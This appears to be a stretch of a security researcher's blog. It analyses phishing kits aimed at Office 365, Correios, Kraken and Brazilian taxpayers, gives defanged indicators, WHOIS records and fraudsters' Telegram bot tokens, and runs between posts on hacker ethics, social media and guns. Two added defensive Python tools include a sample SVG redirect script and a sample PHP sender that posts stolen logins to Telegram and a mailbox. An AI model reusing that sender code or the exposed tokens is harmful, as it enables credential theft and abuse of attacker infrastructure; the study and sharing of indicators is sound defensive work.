Today I found an email with an SVG attachment in my secondary email account. The account is on Office 365 and the email was not in spam; this is not good, especially considering how much 365 costs! Anyway, back to the email: it was clearly suspicious, also considering the attachment, an SVG file named “Your-to-do-List.svg”, supposedly sent to me by myself.
I immediately downloaded the file and opened it with Notepad++ (all this without the antivirus having anything to say about it…). Inside there was a script that, through a simple algorithm, redirected to a phishing site aimed at stealing the credentials of that same Office 365 account.
The target URL is: hxxps://bzzrr[.]yiunwox[.]es/!7ijf9v9ehpNFEKt/$
When I tried to forward the message to my Gmail account, Google’s mail server correctly returned an error 🙂
As always, avoid downloading and opening attachments if you are not sure of the source.
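An SVG is XML, so the attachment can be triaged statically without ever rendering it: look for `<script>` elements, `on*` event handlers, `javascript:` hrefs and `foreignObject`, and pull the string literals out of any script to see what URL a trivial "split and join" redirect reassembles. The following is an added example and not the attachment or the tooling from the post; the SVG below is constructed to mimic the shape of the attack described (the host name is a reserved `.invalid` one), and `triage_svg`, `is_active` and `candidate_targets` are names chosen here.

```python
"""Static triage of an SVG attachment: find script and other active content
without rendering the file. Added example; the sample SVG is constructed."""
import re
import xml.etree.ElementTree as ET

# Constructed sample, NOT the "Your-to-do-List.svg" from the post. It only
# mimics the pattern described there: a <script> that assembles a URL from
# pieces and redirects. The host is a reserved, non-routable example name.
SAMPLE_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="10" height="10">
  <rect width="10" height="10" fill="white"/>
  <script type="text/javascript"><![CDATA[
    var p = ["https://", "login", ".example", ".invalid", "/?id=", "x"];
    window.location = p.join("");
  ]]></script>
  <a xlink:href="javascript:void(0)"><text onclick="go()">open</text></a>
</svg>
"""

# Single- or double-quoted JS string literal (handles backslash escapes).
STRING_LITERAL = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")


def _local(name: str) -> str:
    """Strip the XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1]


def triage_svg(data: bytes) -> dict:
    """Walk the SVG tree and collect every kind of active content found."""
    # For untrusted files use defusedxml.ElementTree instead; the stdlib
    # parser is fine here only because the sample is constructed.
    root = ET.fromstring(data)
    findings = {"scripts": [], "event_handlers": [], "js_hrefs": [],
                "foreign_objects": 0, "string_literals": []}
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            body = (el.text or "").strip()          # CDATA arrives as .text
            findings["scripts"].append(body)
            findings["string_literals"] += [m.group(2) for m in STRING_LITERAL.finditer(body)]
        elif tag == "foreignObject":
            findings["foreign_objects"] += 1        # can embed arbitrary HTML
        for attr, value in el.attrib.items():
            name = _local(attr)                     # xlink:href -> href
            if name.lower().startswith("on"):       # onload, onclick, ...
                findings["event_handlers"].append((tag, name, value))
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings["js_hrefs"].append((tag, value))
    return findings


def is_active(findings: dict) -> bool:
    """True if the SVG carries any executable content at all."""
    return bool(findings["scripts"] or findings["event_handlers"]
                or findings["js_hrefs"] or findings["foreign_objects"])


def candidate_targets(findings: dict) -> list:
    """Join the script's string literals in source order and pull out anything
    URL-like. This defeats only the trivial "URL split into an array" trick;
    real obfuscation needs a JS sandbox or manual work."""
    joined = "".join(findings["string_literals"])
    return re.findall(r"https?://[^\s\"'<>]+", joined)


if __name__ == "__main__":
    f = triage_svg(SAMPLE_SVG)
    print("active content:", is_active(f))
    print("handlers:", f["event_handlers"], "js hrefs:", f["js_hrefs"])
    print("candidate redirect targets:", candidate_targets(f))
```

A clean SVG (shapes and paths only) yields no findings; anything that does is worth detonating in a sandbox rather than opening in a browser, since mail filters and AV evidently let the file through.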
In the last few weeks I have noticed that attacks on Correios are constant. I have studied the matter a bit: Correios is the Brazilian state company that manages shipments and the payments related to them.
The scam is always the same: attackers write to users saying that a shipment is blocked and that a small payment is needed to unblock it. What is interesting about this attack is that when the user enters their CPF (Cadastro de Pessoas Físicas), their personal data is displayed on the page, and to the user this certainly looks like a sign of legitimacy.
The domain used for the attack is cpf-pendente[.]co[.]ua and it was registered a few hours ago.
The first curiosity is that the archive is a RAR instead of a ZIP. Someone hoped to make life difficult for Matrix, but I love writing code, and so Matrix can open different types of archives, obviously including RAR 🙂
Aside from the type of archive, what made me curious about this kit was the functionality of looking up user data starting from the CPF. I do not know Brazilian law, but that personal data can be retrieved from a simple number seems unsafe to me.
The kit uses an external service to resolve the client data. I assume this service is part of the attack and probably uses yet another service in turn, perhaps a legitimate one or a leak from who knows where. The service is available at the domain anonimobusca[.]online, which was registered one week ago.
Domain Name: ANONIMOBUSCA.ONLINE
Registry Domain ID: D544101018-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2025-04-15T13:27:33.0Z
Creation Date: 2025-04-15T13:27:28.0Z
Registry Expiry Date: 2026-04-15T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant / Admin / Tech / Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: IGNAT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2025-04-23T07:20:24.0Z <<<
To obtain the user information, the phishing kit uses a specific resource exposed by the second domain (anonimobusca[.]online).
Another aspect is related to how payments are collected. The kit does not in fact collect the payment data itself: the user makes the payment through third-party systems that manage the transactions. The services used to perform the transactions are paguesafe[.]com and atlaspagamentos[.]com; their WHOIS records follow.
Both services have been active for a short time, use cheap providers for domain management and have free certificates. In short, I would say that nothing about them inspires trust.
Domain Name: paguesafe.com
Registry Domain ID: 2805917900_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.rrpproxy.net
Registrar URL: https://www.hostinger.com/contacts
Updated Date: 2025-01-22T02:22:32Z
Creation Date: 2023-08-14T19:17:29Z
Registrar Registration Expiration Date: 2025-08-14T19:17:29Z
Registrar: Key-Systems GmbH
Registrar IANA ID: 269
Registrar Abuse Contact Email: abusereport@key-systems.net
Registrar Abuse Contact Phone: +49.68949396850
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Name: On behalf of paguesafe.com OWNER
Registrant Organization: c/o whoisproxy.com
Registrant Street: 604 Cameron Street
Registrant City: Alexandria
Registrant State/Province: VA
Registrant Postal Code: 22314
Registrant Country: US
Registrant Phone: +64.48319528
Registrant Email: 20f3221829e93b3a03d0a4bba3bcdb0491e3ed52d42dd6bff0f8d15a0f6fc777@paguesafe.com.whoisproxy.org
Admin, Tech and Billing contacts: the same whoisproxy.com proxy data as the Registrant (names "On behalf of paguesafe.com ADMIN / TECH / BILLING")
Name Server: ns1.dns-parking.com
Name Server: ns2.dns-parking.com
DNSSEC: unsigned
Whoisprivacy: 1
URL of the ICANN WHOIS Data Problem Reporting System: https://wdprs.internic.net/
>>> Last update of WHOIS database: 2025-04-23T07:20:56Z <<<
Domain Name: atlaspagamentos.com
Registry Domain ID: 2936397696_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2024-11-22T15:48:06Z
Creation Date: 2024-11-22T15:48:06Z
Registrar Registration Expiration Date: 2025-11-22T15:48:06Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com, 100 S. Mill Ave, Suite 1600
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85281
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Email: https://www.godaddy.com/whois/results.aspx?domain=atlaspagamentos.com&action=contactDomainOwner
Tech contact: the same Domains By Proxy, LLC data as the Registrant
Name Server: ARYA.NS.CLOUDFLARE.COM
Name Server: BRETT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2025-04-23T07:22:01Z <<<
To this I would like to add that the two graphical interfaces are practically identical.
Nothing annoys me more than hearing the term “hacker” used as a synonym for “criminal”. I can actually accept it from people who do something else in life. It really bothers me when this abuse comes from people who say they are cyber security professionals.
I understand that in recent years everyone has become a cyber security expert. Those who were previously blockchain experts, before that big data experts, and before that experts in one of the many other trends that have plagued IT. In many cases the right place for many of them would have been a nice industrial fryer for chips in a fast food restaurant.
“I know that I know nothing”: having quoted Socrates, I can admit that I am not the right person to explain what a hacker is, so I report the Manifesto.
If you don’t work in IT and you don’t know it, it’s not serious. If you work in IT and you don’t know it, it’s serious. If you work in cyber security and you don’t know it, for me mayonnaise and ketchup 😉
Being a hacker means facing life with passion and living that passion without limits. This does not mean harming others. For this reason a hacker is not a criminal. He can become one if he harms others, but in doing so he becomes a criminal and must be considered as such.
Another thing: let’s be serious, “ethical hacker” is funny, it smacks of an elderly “script kiddie”!
After many years as a Facebook user yesterday I deactivated my Facebook account. I also deleted my Instagram, but in fact I never used it. The people at Twitter had blocked my Twitter account, so now if you want to talk to me you have to send me an email or call me on the phone 🙂
I know it’s not a big deal, but several friends have been asking me why in the last few hours, so I decided to share the why here, where I can write freely.
I’ve always had a fairly active social life on Facebook, I liked sharing what I was doing and participating in what my friends were sharing. But my passion for social media passed when I realized that social media has become mainly a tool for revenge. Whoever has to say something stupid says it on social media. The real environment in which we live protects and regulates us, no one can say too much bullshit without being reprimanded. Social media, on the other hand, has become the megaphone of morons in too many cases.
Last month I tried deleting the app from my smartphone. It worked well, the usage time was reduced and it didn’t cost me any effort. Finally I could spend more time on the toilet with Nova Lectio. The notification mechanism is evil, it needs to be managed, especially for young people who grew up with it and are convinced that it’s normal to always be available to others and, even worse, to a program that tries to sell you stuff or, even worse, to sell you to others.
After what happened in Romania, where a civilized state defended itself from a rigged outcome via social media. After seeing how the American government views Europe (and I am happy to be European). After seeing the support that social media gives to characters that I consider embarrassing for the human species. After all this, I thought it was better to take a step back.
I will continue to use LinkedIn because so far “mom Microsoft” is doing a great job and it seems to me that it continues to be a place where one can be at peace.
I’ve never kissed anyone’s ass, and I certainly won’t do it through someone else.
Looking at what ends up in the Matrix network, I noticed a kit that targets Kraken customers.
As usual, the victim is frightened with an alleged compromise of their account.
The interesting aspect of this kit is that instead of asking the victim to enter their wallet details, the application suggests that the victim schedule a phone meeting. The user is asked to leave their phone number and is even provided with an .ics file with the appointment details, so that the victim remembers not to make other commitments 😀
The user data is sent to a Telegram bot, as usual.
Looking at the updates received by the bot, we find several messages waiting to be read by the fraudster. Since the domain where we found the kit does not yet have the kit online, this means that there are other sites with the kit already in operation.
Searching Elastic for domains with “kraken” in their names that are managed by the same DNS server (dnspod.com) brought up several other domains including kraken-centre.com which of course has the kit already online.
Free time is scarcer and scarcer; nevertheless I try to dedicate at least a couple of hours every week to the analysis of the Matrix evidence. I dedicate some of that time to the analysis of phishing kits and to sharing the email and Telegram token indicators on my public IOC repo: https://github.com/ecarlesi/ioc.git
From this analysis a spontaneous question arises: why do the same accounts continue to be active over time? Does no one notice that they are being used for illicit purposes?
The obvious answer might be that Telegram is based in Dubai, founded by a Russian, maybe preventing or mitigating fraud is not at the forefront of their minds. Maybe. Let’s say the same goes for Yandex, they are Russian. Maybe. What I don’t understand though is why they don’t block Gmail and Yahoo accounts either, just to name two non-Russian companies.
Let’s take the segdairo at gmail dot com account for example. I personally found it in 5 different attacks, the first dating back to May 13, 2024.
Later I found it in other kits, within which I identified further indicators:
hxxps://digitalbankingsonoraweb[.]online/verify/SONORA%20CU.zip contains the Telegram token 5453712056:AAE5M0Nnbcm0eanesMhIV62mNU_WgM20A6c
hxxps://dlgitaldove88system[.]online/FIRST%20FIFELITY%20BANK.zip contains the Telegram token 7223951606:AAHTkeSZ1UFauExPuwkzK_wfORFsldNFbnA
hxxps://digitalconnectfirstnow[.]online/FIRST%20UNITED%20BANK.zip contains the email account hakekelly07 at gmail dot com and the Telegram token 7103172103:AAFibon0scauwaJ6gnsY3vBfQ7e13IST9QY
hxxps://online-ctricbonline[.]cfd/cancel/login%20(1).zip contains the Telegram token 6318747656:AAFlcQchhlCb9DNkfpXvCEKXhSr0yINXgQc
hxxps://dashboardverfedconnect[.]online/VERMONT%20FCU.zip contains the Telegram token 7482950914:AAEupDhXYLKY_vvZHvwiCdgG_A2y4W5Jgn8
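Indicators like the ones above come straight out of the kit source: the PHP "sender" script carries the Telegram bot token, the drop mailbox and the redirect URL as plain string literals. The following is an added example of that extraction, not the Matrix code from the post; the two sample files are constructed (made-up token, mailbox and `.invalid` host), and `extract_iocs`, `telegram_bot_id`, `defang_url`, `defang_email` and `report` are names chosen here. The output is defanged in the same style the post uses, so it can be pasted into a report or an IOC repo without producing live links.

```python
"""Extract exfiltration indicators (Telegram bot tokens, e-mail addresses,
URLs) from phishing-kit source and emit them defanged. Added example; the
sample kit files below are constructed, not a real kit."""
import hashlib
import re

# Constructed sample: shaped like the PHP sender found in these kits, but the
# token, chat id, mailbox and hosts are all made up (example / .invalid names).
SAMPLE_KIT = {
    "send.php": r'''<?php
$token   = "123456789:AAHfakeFAKEfakeFAKEfakeFAKEfakeFAKE";
$chat_id = "987654321";
$msg = "Login: ".$_POST['user']." Pass: ".$_POST['pass']." IP: ".$_SERVER['REMOTE_ADDR'];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=".urlencode($msg));
mail("dropbox.example@example.com", "New Login", $msg);
header("Location: https://login.example.invalid/verify");
''',
    "index.html": "<html><body><h1>Hostinger</h1></body></html>",
}

# A bot token is "<numeric bot id>:<35 chars of [A-Za-z0-9_-]>".
TELEGRAM_TOKEN = re.compile(r"\b(\d{8,10}):([A-Za-z0-9_-]{35})\b")
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")
URL = re.compile(r"https?://[^\s\"'<>]+")


def extract_iocs(files: dict) -> dict:
    """files maps a path inside the kit archive to its text content.
    Returns the indicator sets plus a sha256 per file for the report."""
    iocs = {"telegram_tokens": set(), "emails": set(), "urls": set(), "sha256": {}}
    for path, content in files.items():
        iocs["sha256"][path] = hashlib.sha256(content.encode("utf-8")).hexdigest()
        iocs["telegram_tokens"].update(m.group(0) for m in TELEGRAM_TOKEN.finditer(content))
        iocs["emails"].update(EMAIL.findall(content))
        iocs["urls"].update(URL.findall(content))
    return iocs


def telegram_bot_id(token: str) -> int:
    """The part before the colon is the bot's own Telegram user id; it stays
    the same even when the fraudster regenerates the secret half."""
    return int(token.split(":", 1)[0])


def defang_url(url: str) -> str:
    """https://a.b/c -> hxxps://a[.]b/c (only the host part gets the brackets)."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def defang_email(addr: str) -> str:
    """user@example.com -> user@example[.]com"""
    user, domain = addr.rsplit("@", 1)
    return user + "@" + domain.replace(".", "[.]")


def report(iocs: dict) -> list:
    """One line per indicator, in the style used in the post."""
    lines = []
    for t in sorted(iocs["telegram_tokens"]):
        lines.append(f"Telegram token {t} (bot id {telegram_bot_id(t)})")
    for e in sorted(iocs["emails"]):
        lines.append(f"email account {defang_email(e)}")
    for u in sorted(iocs["urls"]):
        lines.append(f"URL {defang_url(u)}")
    for path, digest in sorted(iocs["sha256"].items()):
        lines.append(f"file {path} sha256 {digest}")
    return lines


if __name__ == "__main__":
    for line in report(extract_iocs(SAMPLE_KIT)):
        print(line)
```

In practice the input dict is built by walking the extracted archive (ZIP or RAR, as the post notes) and reading every text-like file; binary blobs and images are skipped. A recovered token identifies the bot, and the bot id survives token rotation, which is why tracking it across kits, as done above with the Gmail address, is useful.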
Not understanding why email accounts are not blocked even when they are clearly involved in illicit activities, I tried to find out how to report a criminal email account. Searching on the internet I found some instructions from Google on how to report an email you have received. However, I did not find how to report an account involved in illicit activities without having received an email from it in my Gmail account. I also found directions regarding Google Workspace accounts, which are very convenient, but this is not the case here.
I finally found a link to the Internet Crime Complaint Center (ic3[.]gov). There is a form to report the event. It is now dinner time, given the length of the form, maybe I will do it after dinner.
Here I found something interesting: the Government explains how to recognize a legitimate Government domain: there is “.gov” and the padlock that indicates the use of HTTPS…
I would say that does not work very well, since every day there are thousands of new domains that meet these requirements 😀
At the end of a pretty busy day, I finally found a few minutes to check out the incoming notifications from Matrix. I noticed a kit that targets Kraken customers, because their icon reminds me of a ghost from Pac-Man, and just today I got the vintage Pac-Man console 🙂
The domain used for the attack is krakeeen[.]top. It was registered three days ago and Matrix kept monitoring it, waiting for the kit, which arrived a few hours ago. Thanks, attacker 🙂
At the moment the only reports on this domain are those made by Matrix.
As usual, the kit is PHP based.
Every now and then someone tells me that from my posts it seems I don’t love PHP! That’s not true: I really like PHP; it’s just that the code in these kits is often badly written and therefore sucks.
I love PHP and its community!!!!!
As for the stolen credentials, the kit sends them to the email address hardeyholar47@gmail[.]com.
Of course I added it to the list that I hope you already know 🙂
This morning I came across a kit aimed at Brazilian taxpayers. The domain used for the attack is consultarencomeda[.]online
The attack is currently in its initial phase: the domain was registered a few hours ago and the kit has just been copied to the hosting. Matrix intercepted both activities, analyzed the archive containing the kit and sent a notification to urlscan. So far no one has reported this site as malicious.
The default page of the kit mimics a Hostinger landing page in an attempt to fool crawlers.
Opening the kit we discover how it works. At its base there is always the attempt to put pressure on the user; here the payment of a fee is demanded.
Without wasting time on how the kit works (as always it is poorly written PHP code), I highlight the channels used for payment and for sending notifications to the customer.
The transaction takes place through a service provided by the domain codetech-payment-fanpass[.]rancher[.]codefabrik[.]dev
This service has no internet presence, is not advertised, nor have I been able to figure out who it is associated with.
Notifications are sent via pushcut[.]io; of course this is a legitimate service, and I hope the presence of a key in the kit can help the company identify the abuse.
I have always been opposed to private citizens owning weapons. It seems to me to be a surrender by society, which, unable to guarantee security, subcontracts it to individuals. In Europe, the use of force is the exclusive prerogative of the state. I consider this a great achievement of civilization. Not least because it is based on the principle that personal freedom begins where that of others ends. My freedom cannot be total because it would end up limiting that of others.
Let me explain it for dummies: I can’t play with uranium in my house because the radiation would be harmful to my neighbors. Do I have the right to keep radioactive material at home? No. Does this limit my freedom? Yes. Is this a problem? No, damn it!
At this point, a Trump supporter might argue that if someone is a criminal, they could also use a knife to kill, or a car, or a lot of other things. This reasoning is specious because firearms are designed for the sole purpose of killing, unlike knives and cars.